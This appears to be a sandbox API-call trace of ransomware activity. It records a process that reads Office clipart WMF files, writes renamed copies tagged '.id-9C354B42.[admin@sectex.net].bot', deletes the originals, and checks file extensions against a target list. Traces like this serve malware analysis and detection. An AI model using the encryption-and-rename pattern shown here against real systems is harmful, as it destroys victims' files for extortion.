	[0143.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.693] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.693] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.693] GetLastError () returned 0x0
	[0143.693] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x8d6, lpOverlapped=0x0) returned 1
	[0143.783] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8e0, lpOverlapped=0x0) returned 1
	[0143.784] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.784] WriteFile (in: hFile=0x3c0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.784] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.784] CloseHandle (hObject=0x3c0) returned 1
	[0143.785] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.785] SetEndOfFile (hFile=0x3c4) returned 1
	[0143.788] CloseHandle (hObject=0x3c4) returned 1
	[0143.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf")) returned 1
	[0143.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.863] lstrlenW (lpString=".doc") returned 4
	[0143.864] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.867] lstrlenW (lpString=".docx") returned 5
	[0143.868] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0143.868] lstrlenW (lpString=".pdf") returned 4
	[0143.872] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.874] lstrlenW (lpString=".xls") returned 4
	[0143.876] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.876] lstrlenW (lpString=".xlsx") returned 5
	[0143.879] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0143.881] lstrlenW (lpString=".ppt") returned 4
	[0143.885] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.886] lstrlenW (lpString=".zip") returned 4
	[0143.886] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.886] lstrlenW (lpString=".rar") returned 4
	[0143.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString=".bz2") returned 4
	[0143.887] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString=".7z") returned 3
	[0143.887] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString=".dbf") returned 4
	[0143.887] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString=".1cd") returned 4
	[0143.887] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString=".jpg") returned 4
	[0143.887] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString=".doc") returned 4
	[0143.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString=".docx") returned 5
	[0143.887] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0143.887] lstrlenW (lpString=".pdf") returned 4
	[0143.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString=".xls") returned 4
	[0143.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.887] lstrlenW (lpString=".xlsx") returned 5
	[0143.887] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0143.887] lstrlenW (lpString=".ppt") returned 4
	[0143.887] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.887] lstrlenW (lpString=".zip") returned 4
	[0143.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.887] lstrlenW (lpString=".rar") returned 4
	[0143.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.888] lstrlenW (lpString=".bz2") returned 4
	[0143.888] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.888] lstrlenW (lpString=".7z") returned 3
	[0143.888] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.888] lstrlenW (lpString=".dbf") returned 4
	[0143.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.888] lstrlenW (lpString=".1cd") returned 4
	[0143.888] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 63
	[0143.888] lstrlenW (lpString=".jpg") returned 4
	[0143.888] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.888] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.888] lstrlenW (lpString="DD00234_.WMF") returned 12
	[0143.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.909] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=29628) returned 1
	[0143.909] CloseHandle (hObject=0x3cc) returned 1
	[0143.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 0x20
	[0143.952] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0143.952] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.953] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0143.953] GetLastError () returned 0x0
	[0143.953] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x73bc, lpOverlapped=0x0) returned 1
	[0144.014] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x73c0, lpOverlapped=0x0) returned 1
	[0144.017] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.017] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.017] SetEndOfFile (hFile=0x25c) returned 1
	[0144.017] CloseHandle (hObject=0x25c) returned 1
	[0144.017] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.017] SetEndOfFile (hFile=0x39c) returned 1
	[0144.020] CloseHandle (hObject=0x39c) returned 1
	[0144.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 1
	[0144.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.022] lstrlenW (lpString=".doc") returned 4
	[0144.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.022] lstrlenW (lpString=".docx") returned 5
	[0144.022] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.022] lstrlenW (lpString=".pdf") returned 4
	[0144.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.022] lstrlenW (lpString=".xls") returned 4
	[0144.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.022] lstrlenW (lpString=".xlsx") returned 5
	[0144.022] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.022] lstrlenW (lpString=".ppt") returned 4
	[0144.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.022] lstrlenW (lpString=".zip") returned 4
	[0144.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.022] lstrlenW (lpString=".rar") returned 4
	[0144.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString=".bz2") returned 4
	[0144.023] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString=".7z") returned 3
	[0144.023] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString=".dbf") returned 4
	[0144.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString=".1cd") returned 4
	[0144.023] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString=".jpg") returned 4
	[0144.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString=".doc") returned 4
	[0144.023] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString=".docx") returned 5
	[0144.023] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.023] lstrlenW (lpString=".pdf") returned 4
	[0144.023] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString=".xls") returned 4
	[0144.023] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.023] lstrlenW (lpString=".xlsx") returned 5
	[0144.023] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.023] lstrlenW (lpString=".ppt") returned 4
	[0144.023] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.023] lstrlenW (lpString=".zip") returned 4
	[0144.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.023] lstrlenW (lpString=".rar") returned 4
	[0144.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.023] lstrlenW (lpString=".bz2") returned 4
	[0144.024] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.024] lstrlenW (lpString=".7z") returned 3
	[0144.024] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.024] lstrlenW (lpString=".dbf") returned 4
	[0144.024] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.024] lstrlenW (lpString=".1cd") returned 4
	[0144.024] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63
	[0144.024] lstrlenW (lpString=".jpg") returned 4
	[0144.024] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.024] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.024] lstrlenW (lpString="DD00297_.WMF") returned 12
	[0144.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.025] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=40030) returned 1
	[0144.025] CloseHandle (hObject=0x39c) returned 1
	[0144.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 0x20
	[0144.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.025] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.025] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.026] GetLastError () returned 0x0
	[0144.026] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9c5e, lpOverlapped=0x0) returned 1
	[0144.075] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9c60, lpOverlapped=0x0) returned 1
	[0144.077] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.077] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.077] SetEndOfFile (hFile=0x25c) returned 1
	[0144.077] CloseHandle (hObject=0x25c) returned 1
	[0144.077] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.077] SetEndOfFile (hFile=0x39c) returned 1
	[0144.080] CloseHandle (hObject=0x39c) returned 1
	[0144.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.080] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 1
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.081] lstrlenW (lpString=".doc") returned 4
	[0144.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString=".docx") returned 5
	[0144.081] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.081] lstrlenW (lpString=".pdf") returned 4
	[0144.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString=".xls") returned 4
	[0144.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.081] lstrlenW (lpString=".xlsx") returned 5
	[0144.081] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.081] lstrlenW (lpString=".ppt") returned 4
	[0144.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.081] lstrlenW (lpString=".zip") returned 4
	[0144.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.081] lstrlenW (lpString=".rar") returned 4
	[0144.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString=".bz2") returned 4
	[0144.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString=".7z") returned 3
	[0144.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.081] lstrlenW (lpString=".dbf") returned 4
	[0144.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.081] lstrlenW (lpString=".1cd") returned 4
	[0144.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".jpg") returned 4
	[0144.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".doc") returned 4
	[0144.082] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString=".docx") returned 5
	[0144.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.082] lstrlenW (lpString=".pdf") returned 4
	[0144.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString=".xls") returned 4
	[0144.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.082] lstrlenW (lpString=".xlsx") returned 5
	[0144.082] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.082] lstrlenW (lpString=".ppt") returned 4
	[0144.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".zip") returned 4
	[0144.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.082] lstrlenW (lpString=".rar") returned 4
	[0144.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString=".bz2") returned 4
	[0144.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString=".7z") returned 3
	[0144.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".dbf") returned 4
	[0144.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".1cd") returned 4
	[0144.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63
	[0144.082] lstrlenW (lpString=".jpg") returned 4
	[0144.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.083] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.083] lstrlenW (lpString="DD00405_.WMF") returned 12
	[0144.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.083] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17584) returned 1
	[0144.083] CloseHandle (hObject=0x39c) returned 1
	[0144.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 0x20
	[0144.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
